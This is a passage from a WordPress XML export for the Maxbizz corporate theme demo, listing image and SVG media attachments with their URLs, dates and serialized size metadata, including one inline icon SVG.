		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/project-slide-2/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>844</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-2-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-2-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-2-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-service</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/pheader-service/</link>
		<pubDate>Fri, 11 Sep 2020 08:07:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-service.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>869</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 08:07:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 08:07:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-service]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-service.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-service.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:29:"2020/09/pheader-service.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:28:"pheader-service-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"pheader-service-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"pheader-service-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"pheader-service-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:30:"pheader-service-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"pheader-service-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"pheader-service-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:30:"pheader-service-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:30:"pheader-service-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/bg1-service-grid/</link>
		<pubDate>Fri, 11 Sep 2020 09:54:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-grid.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>878</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 09:54:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 09:54:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-grid]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-grid.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-grid.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:600;s:4:"file";s:30:"2020/09/bg1-service-grid.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:29:"bg1-service-grid-1-300x94.jpg";s:5:"width";i:300;s:6:"height";i:94;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"bg1-service-grid-1-1024x320.jpg";s:5:"width";i:1024;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"bg1-service-grid-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"bg1-service-grid-1-768x240.jpg";s:5:"width";i:768;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:31:"bg1-service-grid-1-1536x480.jpg";s:5:"width";i:1536;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"bg1-service-grid-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"bg1-service-grid-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:31:"bg1-service-grid-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:31:"bg1-service-grid-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>deal</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/services-with-icon/deal/</link>
		<pubDate>Fri, 11 Sep 2020 10:22:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/deal.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>887</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:22:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:22:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[deal]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>885</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/deal.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/deal.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/service-box1/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>902</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box1-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box1-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box1-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/service-box2/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>903</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box2-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box2-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box2-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/service-box3/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>904</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:35]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box3-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box3-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box3-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/service-box4/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>905</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
